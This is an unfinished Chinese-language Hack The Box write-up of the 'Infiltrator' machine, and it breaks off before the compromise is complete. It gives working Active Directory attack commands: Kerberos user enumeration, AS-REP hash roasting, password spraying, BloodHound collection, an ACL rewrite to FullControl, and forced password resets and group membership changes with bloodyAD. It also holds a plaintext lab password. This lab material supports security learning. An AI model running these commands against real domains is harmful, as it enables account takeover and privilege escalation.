本文主要是介绍Hack The Box-Infiltrator【更新中】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
信息收集&端口利用
nmap -sSVC infiltrator.htbStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 09:17 CST
Nmap scan report for infiltrator.htb
Host is up (0.61s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-02 01:19:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-02T01:20:39+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after: 2025-01-29T13:20:17
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time:
| date: 2024-09-02T01:20:07
|_ start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
开放了挺多端口,并且存在域为dc01.infiltrator.htb,先看80端口信息
看了一会,发现没有什么特别的信息
有一个邮件交流入口,但是应该和以前的机器一样,利用不了,装样子罢
回到端口处,靶机还开放了139,445端口,可能存在SMB漏洞,详见以下链接
https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-smb
先用enum4linux探测是否存在信息泄露
enum4linux -a infiltrator.htb
都没有权限
回到网页,发现网站中有一些用户名,思考这些是否能够用来SMB爆破
在源码中发现一共有7个用户名
将其全部提取出来
使用这些用户名爆破SMB
./kerbrute userenum -d "infiltrator.htb" username.txt --dc "dc01.infiltrator.htb"
但是均失败
回到网页,看到此处的信息,猜测是否是因为用户名格式不对
根据外国名字缩写规则和邮箱格式,重新生成一段字典
再次进行破解尝试
能够爆破出存在的用户名,再使用GetNPUsers筛选出所有不需要”Kerberos预身份验证”的用户
impacket-GetNPUsers infiltrator.htb/ -usersfile newname.txt -outputfile outputusers.txt -dc-ip dc01.infiltrator.htb -no-pass
能够获取到l.clark用户的hash值,此hash值对应的模式为18200,使用hashcat爆破
使用获取到的用户密码再跑一次enum4linux,顺便来一次密码喷洒
还是获取不到啥信息
密码喷洒
crackmapexec smb [ip] -u tname.txt -p [passwd]
发现d.anderson用户的密码也是这个密码
使用bloodhound收集域内信息
bloodhound-python -c ALL -u l.clark -p '[password]' -d dc01.infiltrator.htb -ns [ip]
bloodhound-python -c ALL -u d.anderson -p '[password]' -d dc01.infiltrator.htb -ns [ip]
使用bloodhound分析
通过攻击链能够得到一条攻击路径为:D.ANDERSON->MARKETING DIGITAL->E.RODRIGUEZ->CHIEFS MARKETING->M.HARRIS->DC01
接下来需要一步步的操作
D.ANDERSON->MARKETING DIGITAL
在此攻击链路中,D.ANDERSON对MARKETING DIGITAL具有GenericAll权限,在前面我们知道,该用户不能够直接登录,账户权限受到控制,因此这一步旨在提升d.anderson用户的权限。先获取该用户的TGT,然后再使用该TGT以及GenericAll权限,赋予d.anderson对marketing digital的完全控制权
#获取d.andersonTGT
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
#使用dacledit修改ACL使得d.anderson具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
#没有dacledit的可以从https://github.com/ThePorgs/impacket.git下载并配置
MARKETING DIGITAL->E.RODRIGUEZ
因为e.rodriguez用户包含在marketing digital组中,而d.anderson对其具有完全控制权,可以直接修改其密码
注意,由于密码策略,此处需要执行完上一步后快速执行,不然会报错
#使用d.anderson的权限和bloodAD修改e.rodriguez密码
python3 /root/Dekstop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"
E.RODRIGUEZ->CHIEFS MARKETING
在上一步,我们已经修改了e.rodriguez的密码,在关系图中,可以看到接下去要将该用户添加到chiefs marketing组当中
#获取e.rodriguez的TGT
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
#利用addself权限添加
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
CHIEFS MARKETING->M.HARRIS
将e.rodriguez添加进chiefs marketing后,可以看到chiefs marketing组能够强制修改m.harris的密码,意味着我们也可以通过e.rodriguez身份强制修改m.harris的密码
#使用e.rodriguez身份,在chiefs marketing组中修改m.harris的密码
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.129.204.10 -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"
此处证书认证已经出现了问题,应该是密钥过期了,需要重新快速的运行一遍,那么重新整理一遍思路
#获取d.andersonTGT
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
#使用dacledit修改ACL使得d.anderson具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
#使用d.anderson的权限和bloodAD修改e.rodriguez密码
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"
#获取e.rodriguez的TGT
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
#利用addself权限添加
KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
#使用e.rodriguez身份,在chiefs marketing组中修改m.harris的密码
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"
运行完成后,提示密码已经修改成功,尝试导出证书,使用evil-winrm登录
提示无法定位INFILTRATOR.HTB的KDC,这里需要修改本机的/etc/krb5.conf配置文件
[libdefaults]default_realm = INFILTRATOR.HTBdns_lookup_realm = falsedns_lookup_kdc = falseforwardable = true
[realms]INFILTRATOR.HTB = {kdc = dc01.infiltrator.htbadmin_server = dc01.infiltrator.htb}
[domain_realm].infiltrator.htb = INFILTRATOR.HTBinfiltrator.htb = INFILTRATOR.HTB
这篇关于Hack The Box-Infiltrator【更新中】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
